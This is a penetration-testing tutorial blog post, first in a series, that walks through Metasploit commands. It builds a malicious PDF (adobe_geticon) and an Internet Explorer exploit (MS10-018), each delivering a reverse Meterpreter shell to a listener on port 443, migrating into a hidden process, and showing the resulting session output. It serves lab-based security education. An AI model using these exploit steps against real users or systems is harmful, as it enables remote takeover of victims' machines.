The following is based on my experiences and (limited) knowledge. I am not an expert in anything, nor will I likely ever be one. My hope is that this might help someone, somewhere, sometime. If nothing else, it might be a good start for discussion.
Preamble
This exercise is for educational use only, and is intended to be used in a lab environment, or as part of an authorized pentest. Please always ensure any scans or changes to systems are part of your pentest scope and comply with your rules of engagement.
The following series of posts will walk through a fairly contrived example of how Metasploit can be used to exploit a client behind a firewall and from there be used to dig further into the network, with a final goal of remote desktop access to a Windows server. The purpose is not to go into great detail, but instead show the power of Meterpreter, its extensions and scripts.
Requirements
As mentioned previously, I will be using Backtrack 4 for the testing, and a few vulnerable machines. The first one up is an XP client with a vulnerable version of IE and Adobe Acrobat Reader.
I installed Adobe Reader 8, from oldapps.com for the prurpose of this exercise.
Background
Metasploit has several interfaces, but I like the console, so that is what will be used for this exercise. Throughout the exercise, we will get deeper and more familiar into Metasploit, but there are several excellent resources available for more information like the Metasploit.com site, the Metasploit mailing list, Offensive Security’s Metasploit Unleashed (offensive-security.com), some great videos and examples from Mubix (room362.com), IronGeek (irongeek.com) and the pauldotcom crew (pauldotcom.com) and a new course from SANS (sans.org) called Metasploit Kung Fu just to name a few.
We will be setting up two different client side exploits in this part of the exercise. Both will use the meterpreter payload, which will be explained in more detail in the next instalment.
Process
Adobe:
Launch msfconsole
load sounds
use exploit/windows/fileformat/adobe_geticon
set FILENAME report.pdf
set OUTPUTPATH /tmp
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.111.155
set LPORT 443
set InitialAutoRunScript migrate –f
show options
exploit
Explanation: In Backtrack, I type msfconsle at a terminal to launch.
The first command enables sounds. This isn’t necessary for anything other than my own enjoyment. May thanks to digininja for initially coming up with the idea for this functionality, and to HD for adding it to the base Metasploit framework
The rest of the commands are setting up the exploit. We are using the adobe geticon exploit to create a pdf called report.pdf which will be saved in the /tmp folder. When the pdf is opened with a vulnerable version of adobe, it will connect back to the backtrack machine on port 443 (remember, the firewall only allows web ports).
The AutoRunScript will, on a successful exploit, launch a hidden notepad.exe process on the client, and migrate the meterpreter payload to it. This will ensure that we don’t lose our meterpreter session as soon as the user closes Adobe (which they will, because to them, it would appear that adobe just froze). Look for more on this in a future post.
I try to always do a show options to verify I didn’t make any typos before I start the exploit.
Before we send the file to our client, we have to setup a listener on our machine to receive the reverse meterpreter.
Still in the msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.111.155
set LPORT 443
exploit
Explanation: We are setting up a meterpreter listener for when the client opens our pdf. Metasploit will now dutifully wait until our client launches the pdf. When Metasploit “speaks” we know our target has launched the pdf.
Internet Explorer
This time, we will use a vulnerability in Internet Explorer
use exploit/windows/browser/ms10_018_ie_behaviors
instead of showing each command, I will just display the options. Each one is set with the command
set NAME #value#
msf exploit(ms10_018_ie_behaviors) > show options
Module options:
Name Current Setting Required Description
—- ————— ——– ———–
SRVHOST 192.168.111.155 yes The local host to listen on.
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH reports no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.111.155 yes The listen address
LPORT 443 yes The listen port
Exploit target:
Id Name
— —-
0 (Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista
Explanation:Notice that in this one, we didn’t set an initial script. This exploit has that setting already defined as the default, which you can varify by doing a show advanced.
All we have to do is type in exploit in our msfconsole, and convince our user to connect to http://192.168.111.155/reports.
msf exploit(ms10_018_ie_behaviors) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.111.155:443
[*] Using URL: http://192.168.111.155:80/reports
[*] Server started.
msf exploit(ms10_018_ie_behaviors) >
[*] Sending Internet Explorer DHTML Behaviors Use After Free to 192.168.111.156:64144 (target: IE 6 SP0-SP2 (onclick))…
[*] Sending stage (748032 bytes) to 192.168.111.156
[*] Meterpreter session 1 opened (192.168.111.155:443 -> 192.168.111.156:54337) at 2010-07-13 22:24:09 -0400
[*] Session ID 1 (192.168.111.155:443 -> 192.168.111.156:54337) processing InitialAutoRunScript ‘migrate -f’
[*] Current server process: iexplore.exe (352)
[*] Spawning a notepad.exe host process…
[*] Migrating into process ID 1416
[*] New server process: notepad.exe (1416)
msf exploit(ms10_018_ie_behaviors) > sessions -i 1
[*] Starting interaction with 1…
meterpreter > ipconfig
AMD PCNET Family PCI Ethernet Adapter – Packet Scheduler Miniport
Hardware MAC: 00:0c:29:3e:23:8a
IP Address : 10.13.37.149
Netmask : 255.255.255.0
Explanation: After the meterpreter has connectect back to our listener, to interact with it you type sessions -i # where @ is the Metasploit session number of that particular session, in our case 1. Then I type ipconfig to show the ip of the clients machine.
Next Steps
Exploring the client’s network.